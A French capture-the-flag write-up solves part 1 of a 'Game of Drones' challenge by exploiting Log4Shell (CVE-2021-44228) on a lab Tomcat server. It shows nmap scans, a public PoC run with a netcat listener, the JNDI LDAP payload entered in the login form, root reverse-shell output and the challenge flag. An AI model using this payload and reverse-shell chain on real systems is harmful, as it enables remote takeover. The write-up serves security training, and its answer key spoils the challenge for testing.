# Write up Game of Drones 3 (part 1)

## Consigne :

```
L'entreprise myDrones a déjà subi deux attaques informatiques (2019 et 2021). Elle ne s'en est toujours pas remise et son site vitrine est toujours hors-service. 
Mais a t elle vraiment protégé tous les accès à ses services ?

Pour information, les serveurs sont à-peu-près à jour.

"*Game of Drones*" est en trois parties, un flag est à récupérer/valider pour chaque partie. Démarrer un environnement virtuel et utilisez-le pour ces 3 challenges (déplacement latéral, élévation de privilèges, etc). Attention, la durée de vie de l'environnement est limitée.

<div>
<button class="btn btn-info" onclick="window.open('/portailvms/5','_blank')" >Accéder au portail</button>
</div>
```

## Pièce jointe :

*Néant*

## Serveur :

```
PortailVMS
```

## Points attribués :

```
TODO
```

## Hint : 

```
TODO
```

## Flag :

```
fl@g{log4jIsEv3rywh3re}
```

## Solution : 

On scanne l'adresse IP allouée :
```bash
nmap 172.24.8.200
PORT   STATE SERVICE
8080/tcp open  http-proxy

nmap -sV -p 8080 172.24.8.200
PORT   STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
```

Un serveur *Tomcat*, avec une page web. Je génère une page 404, on récupère la version : `Apache Tomcat/8.0.36`

Si j'essaye une authentification sur la page, j'ai le message d'erreur suivant : `the password you entered was invalid, we will log your information`

Une vulnérabilité récente (dans les consignes il est dit que la machine est à-peu-près à jour) : **log4j** (CVE-2021-44228) :-)
Un POC : https://github.com/kozmer/log4j-shell-poc

Je suis scrupuleusement le fichier README fourni sur ce dépôt.

Sur ma machine, j'exécute un netcat en écoute :
```bash
nc -lvnp 9001
```

J'exécute le POC, en prenant soins d'ajouter ma propre adresse IP (champ ``--userip``)
```python
python3 poc.py --userip 172.24.8.9 --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://172.24.8.9:1389/a}

[+] Starting Webserver on port 8000 http://0.0.0.0:8000
Listening on 0.0.0.0:1389
```

Tout est prêt, je renseigne maintenant dans le formulaire web (à adapter en fonction de votre adresse IP) :
 - login : `${jndi:ldap://172.24.8.9:1389/a}`
 - password : `hello` (sans importance)

![form](images/form.png)

Dans ma console netcat :
```
Connection from 172.24.8.200 40750 received!
id
uid=0(root) gid=0(root) groups=0(root)
ls -l /  
total 8
drwxr-xr-x   1 root   root     179 Aug 31  2016 bin
drwxr-xr-x   2 root   root       6 May 30  2016 boot
drwxr-xr-x   5 root   root     340 Feb  8 17:53 dev
drwxr-xr-x   1 root   root      66 Feb  8 17:53 etc
-rw-r-----   1 root   root      70 Feb  8 17:46 flag
drwxr-xr-x   1 root   root      20 Feb  8 17:49 home
drwxr-xr-x   1 root   root      30 Aug 31  2016 lib
drwxr-xr-x   2 root   root      34 Aug 30  2016 lib64
drwxr-xr-x   2 root   root       6 Aug 30  2016 media
drwxr-xr-x   2 root   root       6 Aug 30  2016 mnt
drwxr-xr-x   2 root   root       6 Aug 30  2016 opt
dr-xr-xr-x 282 nobody nogroup    0 Feb  8 17:53 proc
drwx------   1 root   root      20 Aug 31  2016 root
drwxr-xr-x   3 root   root      30 Aug 30  2016 run
drwxr-xr-x   2 root   root    4096 Aug 30  2016 sbin
drwxr-xr-x   2 root   root       6 Aug 30  2016 srv
dr-xr-xr-x  13 nobody nogroup    0 Feb  8 11:54 sys
drwxrwxrwt   1 root   root      53 Feb  8 17:53 tmp
drwxr-xr-x   1 root   root      19 Aug 31  2016 usr
drwxr-xr-x   1 root   root      41 Aug 31  2016 var
cat /flag
fl@g{log4jIsEv3rywh3re}

Validez le flag et passez à la partie 2 :-)
```

Je valide le flag et je passe ensuite à la partie 2 ...

<!-- Ok F : 20220423 -->
